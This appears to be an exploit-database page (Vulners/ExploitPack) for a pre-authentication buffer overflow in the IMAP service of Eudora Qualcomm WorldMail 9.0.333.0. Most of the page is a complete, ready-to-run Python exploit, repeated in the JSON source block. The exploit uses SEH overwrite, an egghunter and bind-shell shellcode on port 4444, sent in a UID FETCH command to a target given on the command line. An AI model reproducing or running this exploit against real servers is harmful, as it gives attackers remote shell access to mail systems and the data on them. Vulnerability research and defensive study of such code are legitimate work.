Search...

EudoraQualcomm-WorldMail-9.0.333.0

2015-01-04T17:13:32

ID EXPLOITPACK:3439B9EEE23D7D03560010618F92CA88
Type exploitpack
Reporter Muhammad EL Harmeel
Modified 2015-01-04T17:13:32

Description

PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service *

Preauthentication Buffer Overflow. *

Tested on: Windows Server 2003 SP1. *

SEH gets overwritten at 749 bytes when using UID command. *

Only 79 bytes left after SEH, So the shellcode was placed before SEH *

and backward jump is used after SEH to execute the shellcode. *

Shellcode: shell_bind_tcp LPORT4444 EXITFUNCseh , Bad charcters are 0x00 0x7b *

                                        
                                            import sys,socket

if len(sys.argv)!=3:
        banner()
        print "\nUsage: ./worldmail_uid.py &lt;IP&gt; &lt;PORT&gt;\n"
        sys.exit(0)
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" # this is the marker/tag: w00t
 
shellcode = "w00tw00t" + ("\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
"\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
"\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
"\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
"\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
"\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
"\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
"\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
"\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
"\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
"\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
"\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
"\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
"\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
"\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
"\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
"\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
"\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
"\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
"\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
"\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
"\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
"\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
"\x05\x58\x64\x3d\x29\xcf\x85\x14")
 
 
buffer   = "A" * 292                    #Junk
buffer  +=  shellcode                   #Shellcode of 368 bytes to spawn a shell listening on port 4444 
buffer  += "\x90" *81                   #Nop Sled to fill the rest of the buffer after the shellcode 
buffer  += "\xEB\x06\x90\x90"           #Short JMP of 6 bytes.
buffer  += "\x95\xcb\x0d\x60"           #Memory Address of POP POP RETN sequence at module MsccMgr.dll @ windows server 2003.
buffer  += egghunter                    #Egg hunter to search for the tag "w00tw00t" and executes the code after it
buffer  += "}" *32                      #Junk
 
 
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
    s.connect((sys.argv[1],int(sys.argv[2])))
except:
    print "Can\'t connect to server!\n"
    sys.exit(0)
 
 
 
print "[+] Connecting to victim !"
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A013 UID FETCH 4827313:4827313 '+ buffer + "\r\n")
s.close()
print "[+] Exploitation Successful\n"
print "[+] Please Connect to port 4444 on victim IP now !\n"

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:14", "references": [], "description": "\n* - PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service *\n* Preauthentication Buffer Overflow. *\n* - Tested on: Windows Server 2003 SP1. *\n* - SEH gets overwritten at 749 bytes when using UID command. *\n* Only 79 bytes left after SEH, So the shellcode was placed before SEH *\n* and backward jump is used after SEH to execute the shellcode. *\n* - Shellcode: shell_bind_tcp LPORT*4444 EXITFUNC*seh , Bad charcters are 0x00 0x7b *", "edition": 1, "reporter": "Muhammad EL Harmeel", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2015-01-04T17:13:32", "title": "EudoraQualcomm-WorldMail-9.0.333.0", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:14", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:14", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-04T17:13:32", "id": "EXPLOITPACK:3439B9EEE23D7D03560010618F92CA88", "href": "", "viewCount": 1, "sourceData": "import sys,socket\n\nif len(sys.argv)!=3:\n banner()\n print \"\\nUsage: ./worldmail_uid.py <IP> <PORT>\\n\"\n sys.exit(0)\n \negghunter = \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\\x77\\x30\\x30\\x74\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\" # this is the marker/tag: w00t\n \nshellcode = \"w00tw00t\" + (\"\\xb8\\x3b\\xe5\\xd0\\x36\\xda\\xd3\\xd9\\x74\\x24\\xf4\\x5a\\x29\\xc9\\xb1\"\n\"\\x56\\x31\\x42\\x13\\x83\\xc2\\x04\\x03\\x42\\x34\\x07\\x25\\xca\\xa2\\x4e\"\n\"\\xc6\\x33\\x32\\x31\\x4e\\xd6\\x03\\x63\\x34\\x92\\x31\\xb3\\x3e\\xf6\\xb9\"\n\"\\x38\\x12\\xe3\\x4a\\x4c\\xbb\\x04\\xfb\\xfb\\x9d\\x2b\\xfc\\xcd\\x21\\xe7\"\n\"\\x3e\\x4f\\xde\\xfa\\x12\\xaf\\xdf\\x34\\x67\\xae\\x18\\x28\\x87\\xe2\\xf1\"\n\"\\x26\\x35\\x13\\x75\\x7a\\x85\\x12\\x59\\xf0\\xb5\\x6c\\xdc\\xc7\\x41\\xc7\"\n\"\\xdf\\x17\\xf9\\x5c\\x97\\x8f\\x72\\x3a\\x08\\xb1\\x57\\x58\\x74\\xf8\\xdc\"\n\"\\xab\\x0e\\xfb\\x34\\xe2\\xef\\xcd\\x78\\xa9\\xd1\\xe1\\x75\\xb3\\x16\\xc5\"\n\"\\x65\\xc6\\x6c\\x35\\x18\\xd1\\xb6\\x47\\xc6\\x54\\x2b\\xef\\x8d\\xcf\\x8f\"\n\"\\x11\\x42\\x89\\x44\\x1d\\x2f\\xdd\\x03\\x02\\xae\\x32\\x38\\x3e\\x3b\\xb5\"\n\"\\xef\\xb6\\x7f\\x92\\x2b\\x92\\x24\\xbb\\x6a\\x7e\\x8b\\xc4\\x6d\\x26\\x74\"\n\"\\x61\\xe5\\xc5\\x61\\x13\\xa4\\x81\\x46\\x2e\\x57\\x52\\xc0\\x39\\x24\\x60\"\n\"\\x4f\\x92\\xa2\\xc8\\x18\\x3c\\x34\\x2e\\x33\\xf8\\xaa\\xd1\\xbb\\xf9\\xe3\"\n\"\\x15\\xef\\xa9\\x9b\\xbc\\x8f\\x21\\x5c\\x40\\x5a\\xe5\\x0c\\xee\\x34\\x46\"\n\"\\xfd\\x4e\\xe4\\x2e\\x17\\x41\\xdb\\x4f\\x18\\x8b\\x6a\\x48\\xd6\\xef\\x3f\"\n\"\\x3f\\x1b\\x10\\xae\\xe3\\x92\\xf6\\xba\\x0b\\xf3\\xa1\\x52\\xee\\x20\\x7a\"\n\"\\xc5\\x11\\x03\\xd6\\x5e\\x86\\x1b\\x30\\x58\\xa9\\x9b\\x16\\xcb\\x06\\x33\"\n\"\\xf1\\x9f\\x44\\x80\\xe0\\xa0\\x40\\xa0\\x6b\\x99\\x03\\x3a\\x02\\x68\\xb5\"\n\"\\x3b\\x0f\\x1a\\x56\\xa9\\xd4\\xda\\x11\\xd2\\x42\\x8d\\x76\\x24\\x9b\\x5b\"\n\"\\x6b\\x1f\\x35\\x79\\x76\\xf9\\x7e\\x39\\xad\\x3a\\x80\\xc0\\x20\\x06\\xa6\"\n\"\\xd2\\xfc\\x87\\xe2\\x86\\x50\\xde\\xbc\\x70\\x17\\x88\\x0e\\x2a\\xc1\\x67\"\n\"\\xd9\\xba\\x94\\x4b\\xda\\xbc\\x98\\x81\\xac\\x20\\x28\\x7c\\xe9\\x5f\\x85\"\n\"\\xe8\\xfd\\x18\\xfb\\x88\\x02\\xf3\\xbf\\xb7\\xf3\\xc9\\x55\\x2f\\xaa\\xb8\"\n\"\\x17\\x2d\\x4d\\x17\\x5b\\x48\\xce\\x9d\\x24\\xaf\\xce\\xd4\\x21\\xeb\\x48\"\n\"\\x05\\x58\\x64\\x3d\\x29\\xcf\\x85\\x14\")\n \n \nbuffer = \"A\" * 292 #Junk\nbuffer += shellcode #Shellcode of 368 bytes to spawn a shell listening on port 4444 \nbuffer += \"\\x90\" *81 #Nop Sled to fill the rest of the buffer after the shellcode \nbuffer += \"\\xEB\\x06\\x90\\x90\" #Short JMP of 6 bytes.\nbuffer += \"\\x95\\xcb\\x0d\\x60\" #Memory Address of POP POP RETN sequence at module MsccMgr.dll @ windows server 2003.\nbuffer += egghunter #Egg hunter to search for the tag \"w00tw00t\" and executes the code after it\nbuffer += \"}\" *32 #Junk\n \n \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \ntry:\n s.connect((sys.argv[1],int(sys.argv[2])))\nexcept:\n print \"Can\\'t connect to server!\\n\"\n sys.exit(0)\n \n \n \nprint \"[+] Connecting to victim !\"\ndata=s.recv(1024)\nprint \"[+] \"+data.rstrip()\nprint \"[+] Sending evil buffer...\"\ns.send('A013 UID FETCH 4827313:4827313 '+ buffer + \"\\r\\n\")\ns.close()\nprint \"[+] Exploitation Successful\\n\"\nprint \"[+] Please Connect to port 4444 on victim IP now !\\n\"\n", "cvss": {"score": 0.0, "vector": "NONE"}}